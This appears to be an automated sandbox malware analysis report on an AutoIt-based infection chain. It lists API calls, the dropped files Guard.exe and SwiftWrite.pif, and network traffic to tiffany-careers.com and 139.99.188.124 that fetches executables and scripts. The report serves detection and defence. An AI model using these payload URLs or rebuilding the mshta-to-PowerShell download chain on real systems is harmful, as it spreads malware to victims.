Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_00F1FA36
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F13CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00F13CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A24005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_00A24005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2494A GetFileAttributesW,FindFirstFileW,FindClose,24_2_00A2494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_00A2C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,24_2_00A2CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2CD14 FindFirstFileW,FindClose,24_2_00A2CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_00A2F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_00A2F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_00A2FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A23CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_00A23CE2
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 20:00:27 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sun, 15 Dec 2024 10:29:42 GMTETag: "da2a8-6294c8abc9816"Accept-Ranges: bytesContent-Length: 893608Keep-Alive: timeout=5, max=100Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Marketing.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /PefjSkkhb.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /QWCheljD.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 147.45.49.155:80
Source: global trafficHTTP traffic detected: GET /ghep1 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /kiiMf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8FE968 InternetQueryDataAvailable,InternetReadFile,10_2_00007FF79F8FE968
Source: global trafficDNS traffic detected: DNS query: tiffany-careers.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: powershell.exe, 00000012.00000002.2020537958.000002DA80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA81145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
Source: powershell.exe, 00000012.00000002.2020537958.000002DA80227000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.10.drString found in binary or memory: http://139.99.188.124/QWCheljD.txt
Source: PefjSkkhb.exe, 0000000A.00000002.1915362734.000001CB92638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/kiiMf
Source: powershell.exe, 00000012.00000002.2020537958.000002DA81145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.H
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: svchost.exe, 00000004.00000002.2938459221.000001CA45800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 00000004.00000003.1737447900.000001CA455C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000004.00000003.1737447900.000001CA455C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000004.00000003.1737447900.000001CA455C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000004.00000003.1737447900.000001CA455C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000004.00000003.1737447900.000001CA455FD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000005.00000002.1891591827.000001DB5CE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA81904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000012.00000002.2020537958.000002DA8187D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1851770246.000001DB4CDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000005.00000002.1851770246.000001DB4CFEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com
Source: powershell.exe, 00000005.00000002.1851770246.000001DB4CFEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com/Marketing.pdf0
Source: powershell.exe, 00000005.00000002.1851770246.000001DB4D25C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com/PefjSkkhb.exep
Source: powershell.exe, 00000012.00000002.2020537958.000002DA81655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000012.00000002.2020537958.000002DA8187D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000014.00000000.1974013134.0000000000F79000.00000002.00000001.01000000.0000000E.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 00000018.00000002.2933759546.0000000000A89000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000005.00000002.1851770246.000001DB4CDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000004.00000003.1737447900.000001CA45672000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000004.00000003.1737447900.000001CA45606000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000004.00000003.1737447900.000001CA45672000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000004.00000003.1737447900.000001CA45653000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1737447900.000001CA456B7000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000004.00000003.1737447900.000001CA45672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000012.00000002.2020537958.000002DA8187D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000012.00000002.2020537958.000002DA81145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: mshta.exe, 00000003.00000002.1966337969.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1957090898.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948749602.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000005.00000002.1891591827.000001DB5CE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA81904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000004.00000003.1737447900.000001CA45672000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000004.00000003.1737447900.000001CA45606000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000012.00000002.2020537958.000002DA81655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000012.00000002.2020537958.000002DA81655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: mshta.exe, 00000003.00000003.1947805084.000002B37DB43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/
Source: mshta.exe, 00000003.00000002.1965906319.000002B3059A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966105858.000002B37DAD0000.00000004.00000020.00020000.00000000.sdmp, R8CAg00Db8.lnkString found in binary or memory: https://tiffany-careers.com/ghep1
Source: powershell.exeString found in binary or memory: https://tiffany-careers.com/ghep1$global:?
Source: mshta.exe, 00000003.00000002.1966105858.000002B37DADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1)
Source: mshta.exe, 00000003.00000002.1966627930.000002BB7FCBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1...
Source: mshta.exe, 00000003.00000002.1966706556.000002BB7FCDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956325043.000002BB7FCDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1...t
Source: mshta.exe, 00000003.00000003.1965266864.000002B37DAF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966184314.000002B37DAF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep12C
Source: mshta.exe, 00000003.00000002.1966627930.000002BB7FCC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep18
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F900D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00007FF79F900D24
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F24830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,20_2_00F24830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A34830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,24_2_00A34830
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F900A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00007FF79F900A6C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8E7E64 GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,10_2_00007FF79F8E7E64
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F3D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,20_2_00F3D164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A4D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,24_2_00A4D164

System Summary

Source: Process Memory Space: powershell.exe PID: 1260, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: powershell.exe, 00000005.00000002.1891591827.000001DB5D032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3305b38b-6
Source: powershell.exe, 00000005.00000002.1891591827.000001DB5D032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_56be9eb4-b
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: This is a third-party compiled AutoIt script.10_2_00007FF79F8737B0
Source: PefjSkkhb.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: PefjSkkhb.exe, 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7ce5d5ba-1
Source: PefjSkkhb.exe, 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_437a729e-6
Source: PefjSkkhb.exe.5.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d31e1e75-b
Source: PefjSkkhb.exe.5.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_68f39bd4-c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Guard.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
